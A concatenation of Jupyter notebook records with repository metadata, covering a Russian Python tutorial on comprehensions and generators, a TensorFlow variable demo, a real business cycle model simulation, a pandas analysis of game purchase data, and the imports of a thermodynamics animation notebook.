"original_prices = [1.25, -9.45, 10.22, 3.78, -5.92, 1.16]\nprices = [i if i > 0 else 0 for i in original_prices]\nprices",
"_____no_output_____"
]
],
[
[
"Здесь, наше выражение **i** содержит условный оператор, **if i> 0** else **0**. Это говорит Python выводить значение **i**, если число положительное, но менять **i** на **0**, если число отрицательное.",
"_____no_output_____"
],
[
"### Включения для множеств и словарей",
"_____no_output_____"
],
[
"Хотя **list comprehension** в Python является распространенным инструментом, вы также можете создавать множественные и словарные представления (**set and dictionary comprehensions**). **set comprehension** почти точно такое же, как представление списка. Разница лишь в том, что заданные значения обеспечивают, чтобы выходные данные не содержали дубликатов. Вы можете создать **set comprehension**, используя фигурные скобки вместо скобок:",
"_____no_output_____"
]
],
[
[
"quote = \"life, uh, finds a way\"\nunique_vowels = {i for i in quote if i in 'aeiou'}\nunique_vowels",
"_____no_output_____"
]
],
[
[
"Здесь мы вывели все уникальные гласные, которые встретились в строке",
"_____no_output_____"
],
[
"**Dictionary comprehensions** , по сути, работает так же, но с дополнительным требованием определения ключа. Ключ отделяется двоеточием.\n",
"_____no_output_____"
]
],
[
[
"squares = {i: i * i for i in range(10)}\nsquares",
"_____no_output_____"
]
],
[
[
"### Генераторы списков",
"_____no_output_____"
],
[
"По сути, это то же самое, что списковое включение, но только возвращает оно не сам список, а генератор. ",
"_____no_output_____"
]
],
[
[
"type((i * i for i in range(10)))",
"_____no_output_____"
]
],
[
[
"Проверим:",
"_____no_output_____"
]
],
[
[
"x = (i * i for i in range(10))",
"_____no_output_____"
],
[
"next(x)",
"_____no_output_____"
],
[
"next(x)",
"_____no_output_____"
]
],
[
[
"Так-так, функция next работает.",
"_____no_output_____"
]
],
[
[
"x[4]",
"_____no_output_____"
]
],
[
[
"К элементам обращаться нельзя",
"_____no_output_____"
]
],
[
[
"x = (i * i for i in range(10))\nwhile True:\n print(next(x))",
"0\n1\n4\n9\n16\n25\n36\n49\n64\n81\n"
]
],
[
[
"**StopIteration!** Опять что-то знакомое) Получается, что генератор, это , на самом деле, какой-то вид итератора. Так оно и есть. Генератор это итератор, который можно получить с помощью генераторного выражения, например, (i * i for i in range(10)) или с помощью функции-генератора (но об этом в следующей серии.",
"_____no_output_____"
],
[
"\nТак а зачем все это нужно-то? А вот возьмите, например, и посчитайте сумму квадратов первого миллиона чисел",
"_____no_output_____"
]
],
[
[
"%time\nsum([i * i for i in range(1000000)])",
"CPU times: user 3 µs, sys: 0 ns, total: 3 µs\nWall time: 6.91 µs\n"
],
[
"%time\nsum(i * i for i in range(1000000))",
"CPU times: user 2 µs, sys: 0 ns, total: 2 µs\nWall time: 3.81 µs\n"
]
],
[
[
"При использовании генератора время существенно меньше",
"_____no_output_____"
],
[
"Ура, теоретическая часть закончилась. Теперь можно порешать задачи!",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb01c3d38d6fdf1ac40147546ff5ba18b4d73a0e | 2,050 | ipynb | Jupyter Notebook | yuzhouwan-ai/yuzhouwan-ai-tensorflow/src/main/resources/ipython/Variable.ipynb | Celebrate-future/yuzhouwan | bf77fe9ba5a1db84d1a51bb8da4d7591b0af5e8f | [
"Apache-2.0"
] | 44 | 2015-08-04T09:05:17.000Z | 2021-12-19T11:01:31.000Z | yuzhouwan-ai/yuzhouwan-ai-tensorflow/src/main/resources/ipython/Variable.ipynb | huangzhanqiao/yuzhouwan | 4781a25cc36c66af1a83ca7f1bc648424974b0c5 | [
"Apache-2.0"
] | 261 | 2019-06-13T21:22:51.000Z | 2022-03-26T03:29:53.000Z | yuzhouwan-ai/yuzhouwan-ai-tensorflow/src/main/resources/ipython/Variable.ipynb | huangzhanqiao/yuzhouwan | 4781a25cc36c66af1a83ca7f1bc648424974b0c5 | [
"Apache-2.0"
] | 17 | 2016-10-19T09:16:15.000Z | 2021-07-26T08:53:06.000Z | 18.807339 | 51 | 0.467805 | [
[
[
"import tensorflow as tf",
"_____no_output_____"
],
[
"# 创建变量\na = tf.Variable([1, 0])\nb = tf.Variable([0, 1])\n# sub/add 两个 operation\nsub = tf.subtract(a, b)\nadd = tf.add(a, b)\n\n# 初始化变量\ninit = tf.global_variables_initializer()",
"_____no_output_____"
],
[
"# 执行 Session\nwith tf.Session() as sess:\n sess.run(init)\n print(sess.run(sub))\n print(sess.run(add))",
"[ 1 -1]\n[1 1]\n"
],
[
"# Counter\ncounter = tf.Variable(0, name=\"counter\")\nadd_one = tf.add(counter, 1)\nassign = tf.assign(counter, add_one)\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n for _ in range(5):\n sess.run(assign)\n print(sess.run(counter))",
"1\n2\n3\n4\n5\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
cb01c80784770013728348b68fb2f59f898c5ff8 | 81,847 | ipynb | Jupyter Notebook | Lecture Notebooks/Econ126_Class_14.ipynb | letsgoexploring/econ126 | 05f50d2392dd1c7c38b14950cb8d7eff7ff775ee | [
"MIT"
] | 2 | 2020-12-12T16:28:44.000Z | 2021-02-24T12:11:04.000Z | Lecture Notebooks/Econ126_Class_14.ipynb | letsgoexploring/econ126 | 05f50d2392dd1c7c38b14950cb8d7eff7ff775ee | [
"MIT"
] | 1 | 2019-04-29T08:50:41.000Z | 2019-04-29T08:51:05.000Z | Lecture Notebooks/Econ126_Class_14.ipynb | letsgoexploring/econ126 | 05f50d2392dd1c7c38b14950cb8d7eff7ff775ee | [
"MIT"
] | 19 | 2019-03-08T18:49:19.000Z | 2022-03-07T23:27:16.000Z | 199.626829 | 68,080 | 0.892299 | [
[
[
"import numpy as np\nimport pandas as pd\nimport linearsolve as ls\nimport matplotlib.pyplot as plt\nplt.style.use('classic')\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"# Class 14: Prescott's Real Business Cycle Model I\n\nIn this notebook, we'll consider a centralized version of the model from pages 11-17 in Edward Prescott's article \"Theory Ahead of Business Cycle Measurement in the Fall 1986 of the Federal Reserve Bank of Minneapolis' *Quarterly Review* (link to article: https://www.minneapolisfed.org/research/qr/qr1042.pdf). The model is just like the RBC model that we studying in the previous lecture, except that now we include an endogenous labor supply.",
"_____no_output_____"
],
[
"## Prescott's RBC Model with Labor\n\nThe equilibrium conditions for Prescott's RBC model with labor are:\n\n\\begin{align}\n\\frac{1}{C_t} & = \\beta E_t \\left[\\frac{\\alpha A_{t+1}K_{t+1}^{\\alpha-1}L_{t+1}^{1-\\alpha} +1-\\delta }{C_{t+1}}\\right]\\\\\n\\frac{\\varphi}{1-L_t} & = \\frac{(1-\\alpha)A_tK_t^{\\alpha}L_t^{-\\alpha}}{C_t} \\\\\nY_t & = A_t K_t^{\\alpha}L_t^{1-\\alpha}\\\\\nK_{t+1} & = I_t + (1-\\delta) K_t\\\\\nY_t & = C_t + I_t\\\\\n\\log A_{t+1} & = \\rho \\log A_t + \\epsilon_{t+1}\n\\end{align}\n\nwhere $\\epsilon_{t+1} \\sim \\mathcal{N}(0,\\sigma^2)$. \n\nThe objective is use `linearsolve` to simulate impulse responses to a TFP shock using the following parameter values for the simulation:\n\n| $$\\rho$$ | $$\\sigma$$ | $$\\beta$$ | $$\\varphi$$ | $$\\alpha$$ | $$\\delta $$ |\n|----------|------------|-------------|-----------|------------|-------------|\n| 0.75 | 0.006 | 0.99 | 1.7317 | 0.35 | 0.025 |\n\n\nThe value for $\\beta$ implies a steady state (annualized) real interest rate of about 4 percent: \n \n\\begin{align}\n4 \\cdot \\left(\\beta^{-1} - 1\\right) & \\approx 0.04040\n\\end{align}\n\n$\\rho = 0.75$ and $\\sigma = 0.006$ are consistent with the statistical properties of the cyclical component of TFP in the US. $\\alpha$ is set so that, consistent with the long-run average of the US, the labor share of income is about 65 percent of GDP. The deprecation rate of capital is calibrated to be about 10 percent annually. Finally, $\\varphi$ was chosen last to ensure that in the steady state households allocate about 33 percent of their available time to labor.",
"_____no_output_____"
],
[
"## Model Preparation\n\nBefore proceding, let's recast the model in the form required for `linearsolve`. Write the model with all variables moved to the left-hand side of the equations and dropping the expecations operator $E_t$ and the exogenous shock $\\epsilon_{t+1}$:\n\n\\begin{align}\n0 & = \\beta\\left[\\frac{\\alpha A_{t+1}K_{t+1}^{\\alpha-1}L_{t+1}^{1-\\alpha} +1-\\delta }{C_{t+1}}\\right] - \\frac{1}{C_t}\\\\\n0 & = \\frac{(1-\\alpha)A_tK_t^{\\alpha}L_t^{-\\alpha}}{C_t} - \\frac{\\varphi}{1-L_t}\\\\\n0 & = A_t K_t^{\\alpha}L_t^{1-\\alpha} - Y_t\\\\\n0 & = I_t + (1-\\delta) K_t - K_{t+1}\\\\\n0 & = C_t + I_t - Y_t\\\\\n0 & = \\rho \\log A_t - \\log A_{t+1}\n\\end{align}\n\nRemember, capital and TFP are called *state variables* because they're $t+1$ values are predetermined. Output, consumption, and investment are called a *costate* or *control* variables. Note that the model as 5 equations in 5 endogenous variables.\n\n",
"_____no_output_____"
],
[
"## Initialization, Approximation, and Solution\n\nThe next several cells initialize the model in `linearsolve` and then approximate and solve it.",
"_____no_output_____"
]
],
[
[
"# Create a variable called 'parameters' that stores the model parameter values in a Pandas Series\nparameters = pd.Series(dtype=float)\nparameters['rho'] = .75\nparameters['beta'] = 0.99\nparameters['phi'] = 1.7317\nparameters['alpha'] = 0.35\nparameters['delta'] = 0.025\n\n# Print the model's parameters\nprint(parameters)",
"rho 0.7500\nbeta 0.9900\nphi 1.7317\nalpha 0.3500\ndelta 0.0250\ndtype: float64\n"
],
[
"# Create a variable called 'sigma' that stores the value of sigma\nsigma = 0.006",
"_____no_output_____"
],
[
"# Create variable called 'var_names' that stores the variable names in a list with state variables ordered first\nvar_names = ['a','k','y','c','i','l']\n\n# Create variable called 'shock_names' that stores an exogenous shock name for each state variable.\nshock_names = ['e_a','e_k']",
"_____no_output_____"
],
[
"# Define a function that evaluates the equilibrium conditions of the model solved for zero. PROVIDED\ndef equilibrium_equations(variables_forward,variables_current,parameters):\n \n # Parameters. PROVIDED\n p = parameters\n \n # Current variables. PROVIDED\n cur = variables_current\n \n # Forward variables. PROVIDED\n fwd = variables_forward\n \n # Define variable to store MPK. Will make things easier later.\n mpk = p.alpha*fwd.a*fwd.k**(p.alpha-1)*fwd.l**(1-p.alpha)\n \n # Define variable to store MPL. Will make things easier later.\n mpl = (1-p.alpha)*fwd.a*fwd.k**p.alpha*fwd.l**-p.alpha\n\n # Euler equation\n euler_equation = p.beta*(mpk+1-p.delta)/fwd.c - 1/cur.c\n \n # Labor-labor choice\n labor_leisure = mpl/cur.c - p.phi/(1-cur.l)\n \n # Production function\n production_function = cur.a*cur.k**p.alpha*cur.l**(1-p.alpha) - cur.y\n \n # Capital evolution. PROVIDED\n capital_evolution = cur.i + (1 - p.delta)*cur.k - fwd.k\n \n # Market clearing. PROVIDED\n market_clearing = cur.c+cur.i - cur.y\n \n # Exogenous tfp. PROVIDED\n tfp_process = p.rho*np.log(cur.a) - np.log(fwd.a)\n \n \n # Stack equilibrium conditions into a numpy array\n return np.array([\n euler_equation,\n labor_leisure,\n production_function,\n capital_evolution,\n market_clearing,\n tfp_process\n ])",
"_____no_output_____"
]
],
[
[
"Next, initialize the model using `ls.model` which takes the following required arguments:\n\n* `equations`\n* `n_states`\n* `var_names`\n* `shock_names`\n* `parameters`",
"_____no_output_____"
]
],
[
[
"# Initialize the model into a variable named 'rbc_model'\nrbc_model = ls.model(equations = equilibrium_equations,\n n_states=2,\n var_names=var_names,\n shock_names=shock_names,\n parameters=parameters)",
"_____no_output_____"
],
[
"# Compute the steady state numerically using .compute_ss() method of rbc_model\nguess = [1,4,1,1,1,0.5]\nrbc_model.compute_ss(guess)\n\n# Print the computed steady state\nprint(rbc_model.ss)",
"a 1.000000\nk 11.465953\ny 1.149904\nc 0.863256\ni 0.286649\nl 0.333330\ndtype: float64\n"
],
[
"# Find the log-linear approximation around the non-stochastic steady state and solve using .approximate_and_solve() method of rbc_model\nrbc_model.approximate_and_solve()",
"_____no_output_____"
]
],
[
[
"## Impulse Responses\n\nCompute a 26 period impulse responses of the model's variables to a 0.01 unit shock to TFP in period 5.",
"_____no_output_____"
]
],
[
[
"# Compute impulse responses\nrbc_model.impulse(T=26,t0=5,shocks=[0.01,0])\n\n# Print the first 10 rows of the computed impulse responses to the TFP shock\nprint(rbc_model.irs['e_a'].head(10))",
" e_a a k y c i l\n0 0.00 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000\n1 0.00 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000\n2 0.00 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000\n3 0.00 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000\n4 0.00 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000\n5 0.01 0.010000 0.000000 0.015475 0.001708 0.056935 0.008423\n6 0.00 0.007500 0.001423 0.011858 0.002071 0.041333 0.005938\n7 0.00 0.005625 0.002421 0.009133 0.002304 0.029698 0.004093\n8 0.00 0.004219 0.003103 0.007077 0.002442 0.021036 0.002727\n9 0.00 0.003164 0.003551 0.005524 0.002511 0.014600 0.001719\n"
]
],
[
[
"Construct a $2\\times3$ grid of plots of simulated TFP, output, labor, consumption, investment, and capital. Be sure to multiply simulated values by 100 so that vertical axis units are in \"percent deviation from steady state.\"",
"_____no_output_____"
]
],
[
[
"# Create figure. PROVIDED\nfig = plt.figure(figsize=(18,8))\n\n# Create upper-left axis. PROVIDED\nax = fig.add_subplot(2,3,1)\nax.plot(rbc_model.irs['e_a']['a']*100,'b',lw=5,alpha=0.75)\nax.set_title('TFP')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-0.5,2])\nax.grid()\n\n# Create upper-center axis. PROVIDED\nax = fig.add_subplot(2,3,2)\nax.plot(rbc_model.irs['e_a']['y']*100,'b',lw=5,alpha=0.75)\nax.set_title('Output')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-0.5,2])\nax.grid()\n\n# Create upper-right axis. PROVIDED\nax = fig.add_subplot(2,3,3)\nax.plot(rbc_model.irs['e_a']['l']*100,'b',lw=5,alpha=0.75)\nax.set_title('Labor')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-0.5,2])\nax.grid()\n\n# Create lower-left axis. PROVIDED\nax = fig.add_subplot(2,3,4)\nax.plot(rbc_model.irs['e_a']['c']*100,'b',lw=5,alpha=0.75)\nax.set_title('Consumption')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-0.1,0.4])\nax.grid()\n\n# Create lower-center axis. PROVIDED\nax = fig.add_subplot(2,3,5)\nax.plot(rbc_model.irs['e_a']['i']*100,'b',lw=5,alpha=0.75)\nax.set_title('Investment')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-2,8])\nax.grid()\n\n# Create lower-right axis. PROVIDED\nax = fig.add_subplot(2,3,6)\nax.plot(rbc_model.irs['e_a']['k']*100,'b',lw=5,alpha=0.75)\nax.set_title('Capital')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-0.2,0.8])\nax.grid()\n\nfig.tight_layout()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb01d01238c17a20fdd19611706e3db45ca9fb25 | 42,318 | ipynb | Jupyter Notebook | HeroesOfPymoli.ipynb | alyslma/pandas-challenge | 9cdb5a78ed27ab4beeed2b986f7b7b6339b29814 | [
"ADSL"
] | null | null | null | HeroesOfPymoli.ipynb | alyslma/pandas-challenge | 9cdb5a78ed27ab4beeed2b986f7b7b6339b29814 | [
"ADSL"
] | null | null | null | HeroesOfPymoli.ipynb | alyslma/pandas-challenge | 9cdb5a78ed27ab4beeed2b986f7b7b6339b29814 | [
"ADSL"
] | null | null | null | 35.531486 | 179 | 0.386928 | [
[
[
"import pandas as pd\n\ndatafile = \"Resources/purchase_data.csv\"\n\npurchase_data = pd.read_csv(datafile)\npurchase_data.head()",
"_____no_output_____"
],
[
"# Player Count\n\nplayer_count = purchase_data[\"SN\"].count()\nplayer = pd.DataFrame({\"Total Players\": [player_count]})\nplayer",
"_____no_output_____"
],
[
"# Purchasing Analysis (Total)\n\nunique_item = purchase_data[\"Item Name\"].nunique()\navg_price = purchase_data[\"Price\"].mean()\nnum_purchase = purchase_data[\"SN\"].count()\ntotal_rev = purchase_data[\"Price\"].sum()\n\nsummary_df = pd.DataFrame({\"Number of Unique Items\": [unique_item],\n \"Average Price\": [avg_price],\n \"Number of Purchases\": [num_purchase],\n \"Total Revenue\": [total_rev]})\n\nsummary_df[\"Average Price\"] = summary_df[\"Average Price\"].map(\"${:.2f}\".format)\nsummary_df[\"Total Revenue\"] = summary_df[\"Total Revenue\"].map(\"${:,.2f}\".format)\n\nsummary_df",
"_____no_output_____"
],
[
"# Gender Demographics\n\nunique_players = purchase_data[[\"SN\", \"Gender\"]].drop_duplicates()\ngender_counts = unique_players[\"Gender\"].value_counts()\ngender_percent = gender_counts / unique_players[\"Gender\"].count()\n\n# Make gender counts a dataframe\ngender_demo = pd.DataFrame(gender_counts)\n\n# Format percentage of players\ngender_demo[\"Percentage of Players\"] = gender_percent * 100\ngender_demo[\"Percentage of Players\"] = gender_demo[\"Percentage of Players\"].map(\"{0:.2f}%\".format)\n\ngender_demo",
"_____no_output_____"
],
[
"# Purchasing Analysis (Gender) \n\n# List of all genders\ngenders = purchase_data[\"Gender\"].unique()\n\n# Make list of dataframes with each gender's data and lists for each calculation\ngender_df = []\ngender_purc_count = []\ngender_avg_price = []\ngender_purc_total = []\ngender_avg_total = []\n\nfor n in range(len(genders)):\n value = purchase_data.loc[(purchase_data[\"Gender\"] == genders[n])]\n gender_df.append(value)\n # Purchase count\n value = gender_df[n][\"SN\"].count()\n gender_purc_count.append(value)\n # Average purchase price\n value = gender_df[n][\"Price\"].mean()\n gender_avg_price.append(value)\n # Total purchase value\n value = gender_df[n][\"Price\"].sum()\n gender_purc_total.append(value)\n # Count total unique persons \n unique = gender_df[n][\"SN\"].nunique()\n # Calculate average purchase total per person by gender\n avg_total = value / unique\n gender_avg_total.append(avg_total)\n\n# Summary dataframe\ngender_analy_df = pd.DataFrame({\"Gender\":[genders[0], genders[1], genders[2]],\n \"Purchase Count\":[gender_purc_count[0], gender_purc_count[1], gender_purc_count[2]], \n \"Average Purchase Price\":[gender_avg_price[0], gender_avg_price[1], gender_avg_price[2]],\n \"Total Purchase Value\":[gender_purc_total[0], gender_purc_total[1], gender_purc_total[2]],\n \"Avg Total Purchase per Person\":[gender_avg_total[0], gender_avg_total[1], gender_avg_total[2]]\n }) \n\ngender_analy_df[\"Average Purchase Price\"] = gender_analy_df[\"Average Purchase Price\"].map(\"${:.2f}\".format)\ngender_analy_df[\"Total Purchase Value\"] = gender_analy_df[\"Total Purchase Value\"].map(\"${:,.2f}\".format)\ngender_analy_df[\"Avg Total Purchase per Person\"] = gender_analy_df[\"Avg Total Purchase per Person\"].map(\"${:.2f}\".format)\n\ngender_analy_df = gender_analy_df.set_index([\"Gender\"])\ngender_analy_df",
"_____no_output_____"
],
[
"# Age Demographics\n\n# Lowest age: 7, highest age: 45\nbins = [5, 9, 14, 19, 24, 29, 34, 39, 44, 49]\ngroup_labels = [\"<10\", \"10-14\", \"15-19\", \"20-24\", \"25-29\", \"30-34\", \"35-39\", \"40-44\", \"45+\"]\n \nage_bin = pd.cut(purchase_data[\"Age\"], bins, labels=group_labels, include_lowest=False)\nage_count = pd.DataFrame(age_bin.value_counts(sort=False))\n\n# Rename column\nage_count = age_count.rename(columns ={\"Age\": \"Total Count\"})\n\nage_count[\"Percentage of Players\"] = (age_count[\"Total Count\"] / player_count) * 100\nage_count[\"Percentage of Players\"] = age_count[\"Percentage of Players\"].map(\"{0:.2f}%\".format)\n\nage_count",
"_____no_output_____"
],
[
"# Purchasing Analysis (Age)\nage_analy = purchase_data.copy()\n\n# Add column of age ranges to copy of original dataframe\nage_analy[\"Age Ranges\"] = pd.cut(age_analy[\"Age\"], bins, labels=group_labels, include_lowest=False)\n\n# Get total of unique values per age group\nunique_group_age = age_analy[[\"SN\", \"Age Ranges\"]].drop_duplicates()\nunique_group_age = unique_group_age[\"Age Ranges\"].value_counts(sort=False)\n\n# Make a dataframe for the summary table, add column of unique value counts for each age group\nage_group_sum = pd.DataFrame(unique_group_age)\nage_group_sum = age_group_sum.rename(columns= {\"Age Ranges\" : \"Unique Value Count\"})\nage_group_sum.index.name='Age Ranges'\n\n# Group by age ranges for calculations\ngroup_age = age_analy.groupby(\"Age Ranges\")\n# Add Purchase Count to summary table\nage_group_total_count = group_age[\"Age Ranges\"].count()\nage_group_sum[\"Purchase Count\"] = age_group_total_count\n# Add Average Purchase Price to summary table\nage_group_avg_purch = group_age[\"Price\"].mean()\nage_group_sum[\"Average Purchase Price\"] = age_group_avg_purch\n# Add Total Purchase Value to summary table\nage_group_total = group_age[\"Price\"].sum()\nage_group_sum[\"Total Purchase Value\"] = age_group_total\n# Divide the \"Total Purchase Value\" and \"Unique Value Count\" columns to get Avg Total Purchase per Person\nage_group_avg_total = age_group_sum[\"Total Purchase Value\"] / age_group_sum[\"Unique Value Count\"]\nage_group_sum[\"Avg Total Purchase per Person\"] = age_group_avg_total\n\n# Remove unique value count column from dataframe\ndel age_group_sum[\"Unique Value Count\"]\n# Formatting\nage_group_sum[\"Average Purchase Price\"] = age_group_sum[\"Average Purchase Price\"].map(\"${:.2f}\".format)\nage_group_sum[\"Total Purchase Value\"] = age_group_sum[\"Total Purchase Value\"].map(\"${:,.2f}\".format)\nage_group_sum[\"Avg Total Purchase per Person\"] = age_group_sum[\"Avg Total Purchase per Person\"].map(\"${:.2f}\".format)\n\nage_group_sum",
"_____no_output_____"
],
[
"# Top 5 Spenders \n\n# Total Purchase Value\ntop_total_purc = purchase_data.groupby([\"SN\"]).sum().sort_values(by=[\"Price\"], ascending = False)\ntop_total_purc = top_total_purc[\"Price\"].head(5)\ntop_total_purc_df = pd.DataFrame(top_total_purc)\n \n# Make lists for calculations\ntop_spender_count = []\navg_purc_price = []\nfor n in range(len(top_total_purc_df)):\n # Find Purchase Count for top 5 spenders by counting number of appearances in original data\n count = purchase_data.loc[purchase_data[\"SN\"] == top_total_purc_df.index[n]][\"SN\"].count()\n top_spender_count.append(count)\n # Average Purchase Price\n value = top_total_purc_df.iloc[n, 0] / count\n avg_purc_price.append(value)\n\n# Summary Data Frame\ntop_total_purc_df[\"Purchase Count\"] = top_spender_count\ntop_total_purc_df[\"Average Purchase Price\"] = avg_purc_price\ntop_total_purc_df = top_total_purc_df.rename(columns = {\"Price\" : \"Total Purchase Value\"})\n\n# Reformat price columns\ntop_total_purc_df[\"Average Purchase Price\"] = top_total_purc_df[\"Average Purchase Price\"].map(\"${:.2f}\".format)\ntop_total_purc_df[\"Total Purchase Value\"] = top_total_purc_df[\"Total Purchase Value\"].map(\"${:.2f}\".format)\n# Rearrange columns\ntop_total_purc_df = top_total_purc_df[[\"Purchase Count\", \"Average Purchase Price\", \"Total Purchase Value\"]]\n\ntop_total_purc_df",
"_____no_output_____"
],
[
"# Top 5 Most Popular Items\nitem_df = purchase_data[[\"Item ID\", \"Item Name\", \"Price\"]]\n\n# Purchase Count\nitem_group_count = item_df.groupby([\"Item ID\", \"Item Name\"]).count().sort_values(by=[\"Item ID\"])\nitem_group_count = item_group_count.rename(columns = {\"Price\" : \"Purchase Count\"})\n #print(item_group_count.sort_values(by=[\"Purchase Count\"], ascending = False).head(10))\n# Total Purchase Value\nitem_group_sum = item_df.groupby([\"Item ID\", \"Item Name\"]).sum().sort_values(by=[\"Item ID\"])\nitem_group_sum = item_group_sum.rename(columns = {\"Price\" : \"Total Purchase Value\"})\n# Obtain Item Price by dropping duplicates\nitem_group_price = item_df.groupby([\"Item ID\", \"Item Name\"])[\"Price\"].mean()\nitem_group_price = item_df[[\"Item ID\", \"Item Name\", \"Price\"]].drop_duplicates()\n\n# Merge three dataframes into one\nmerge_item_1 = pd.merge(item_group_count, item_group_sum, on = [\"Item ID\", \"Item Name\"])\nmerge_item = pd.merge(merge_item_1, item_group_price, on = [\"Item ID\", \"Item Name\"])\n# Reset index\nmerge_item = merge_item.set_index([\"Item ID\", \"Item Name\"])\nmerge_item = merge_item.sort_values(by=[\"Purchase Count\", \"Total Purchase Value\"], ascending = False)\n# Column formatting\nmerge_item = merge_item.rename(columns = {\"Price\" : \"Item Price\"})\nmerge_item = merge_item[[\"Purchase Count\", \"Item Price\", \"Total Purchase Value\"]]\n\n# Save a copy for the next section before formatting data values\nmerge_item_df = merge_item.copy()\n\n# Formatting\nmerge_item[\"Item Price\"] = merge_item[\"Item Price\"].map(\"${:.2f}\".format)\nmerge_item[\"Total Purchase Value\"] = merge_item[\"Total Purchase Value\"].map(\"${:.2f}\".format)\n\nmerge_item.head(5)\n#item_group_price1",
"_____no_output_____"
],
[
"# Top 5 Most Profitable Items\n\nmerge_item_df = merge_item_df.sort_values(by=[\"Total Purchase Value\"], ascending = False)\nmerge_item_df[\"Item Price\"] = merge_item_df[\"Item Price\"].map(\"${:.2f}\".format)\nmerge_item_df[\"Total Purchase Value\"] = merge_item_df[\"Total Purchase Value\"].map(\"${:.2f}\".format)\n\nmerge_item_df.head(5)",
"_____no_output_____"
],
[
"\n",
"_____no_output_____"
],
[
"# Three Observable Trends\n\n# (1) According to the age range data, players aged 20-24 purchase the most items overall, while those aged 35-39 spend the most per person.\n# (2) Players who identify themselves as \"Other/Non-Disclosed\" or \"Female\" spend more per total purchase per person than males, $0.49 and $0.40 more respectively.\n# (3) \"Oathbreaker, Last Hope of the Breaking Storm\" is the most popular and the most profitable item with a total purchase count of 12 and total purchase value of $50.76.",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb01dbe7d422bac27b5e7239e8abccc69ba8a2b1 | 82,361 | ipynb | Jupyter Notebook | assets/fig/scripts/thermo_animation.ipynb | LuisG-R/mi-book | b673ba68f1b36953f62aa5f1d45f926a5fb6f648 | [
"CC0-1.0"
] | 1 | 2022-03-18T11:11:18.000Z | 2022-03-18T11:11:18.000Z | assets/fig/scripts/thermo_animation.ipynb | LuisG-R/mi-book | b673ba68f1b36953f62aa5f1d45f926a5fb6f648 | [
"CC0-1.0"
] | null | null | null | assets/fig/scripts/thermo_animation.ipynb | LuisG-R/mi-book | b673ba68f1b36953f62aa5f1d45f926a5fb6f648 | [
"CC0-1.0"
] | 11 | 2021-05-24T00:54:58.000Z | 2021-10-30T23:51:21.000Z | 143.486063 | 62,288 | 0.850342 | [
[
[
"# The thermodynamics of ideal solutions\n\n*Authors: Enze Chen (University of California, Berkeley)*\n\nThis animation will show how the Gibbs free energy curves correspond to a lens phase diagram.\n\n## Python imports",
"_____no_output_____"
]
],
[
[
"# General libraries\nimport io\nimport os\n\n# Scientific computing libraries\nimport numpy as np\nfrom scipy.misc import derivative\nimport matplotlib\nimport matplotlib.pyplot as plt\n%matplotlib inline\nimport matplotlib.animation as animation\nfrom PIL import Image\nimport cv2\nfrom moviepy.editor import *",
"_____no_output_____"
]
],
